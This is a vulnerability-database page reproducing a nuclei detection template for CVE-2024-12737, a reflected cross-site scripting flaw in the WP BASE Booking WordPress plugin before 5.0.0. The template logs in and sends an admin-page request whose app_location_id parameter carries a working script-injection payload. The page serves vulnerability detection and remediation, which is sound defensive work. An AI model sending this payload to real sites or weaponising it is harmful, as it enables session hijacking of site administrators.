Lucene search
K

WP BASE Booking - Reflected XSS

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

WP Base Booking plugin versions before 5.0.0 have reflected XSS due to unsanitized input; update to 5.0.0+.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12737
26 Feb 202506:25
circl
CNNVD
WordPress plugin WP BASE Booking of Appointments, Services and Events 跨站脚本漏洞
26 Feb 202500:00
cnnvd
CVE
CVE-2024-12737
26 Feb 202506:00
cve
Cvelist
CVE-2024-12737 WP BASE Booking of Appointments, Services and Events < 5.0.0 - Reflected XSS
26 Feb 202506:00
cvelist
EUVD
EUVD-2024-53910
3 Oct 202520:07
euvd
NVD
CVE-2024-12737
26 Feb 202513:15
nvd
OSV
CVE-2024-12737
26 Feb 202513:15
osv
Patchstack
WordPress WP BASE Booking of Appointments, Services and Events plugin < 5.0.0 - Reflected XSS vulnerability
31 Dec 202500:00
patchstack
Positive Technologies
PT-2025-8671
26 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-12737
28 Feb 202506:27
redhatcve
Rows per page
id: CVE-2024-12737

info:
  name: WP BASE Booking - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP BASE Booking of Appointments, Services and Events WordPress plugin < 5.0.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to load a maliciously crafted URL.
  impact: |
    Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to version 5.0.0 or later.
  reference:
    - https://wpscan.com/vulnerability/997eb9f6-80e1-4bc5-be72-bd6a6f52379c/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12737
    cwe-id: CWE-79
    epss-score: 0.00578
    epss-percentile: 0.43412
    cpe: cpe:2.3:a:wp-base:wp_base_booking_of_appointments\,_services_and_events:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "wp-base-booking-of-appointments-services-and-events"
  tags: cve,cve2024,wp-base,wordpress,wpscan,wp-plugin,wp,authenticated,xss,wp-base-booking-of-appointments-services-and-events

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=appointments&app_location_id=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`","wp-base-booking-of-appointments-services-and-events")
        condition: and
# digest: 4a0a00473045022043268888d058dd6c622fe702795e6adfa14fd0815e24d83b8d5f0bf312c1e3e2022100984041cab171256e7688851d809367088436a51740908d3e092ec0839d6e06f3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 14:53Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00578
SSVC
10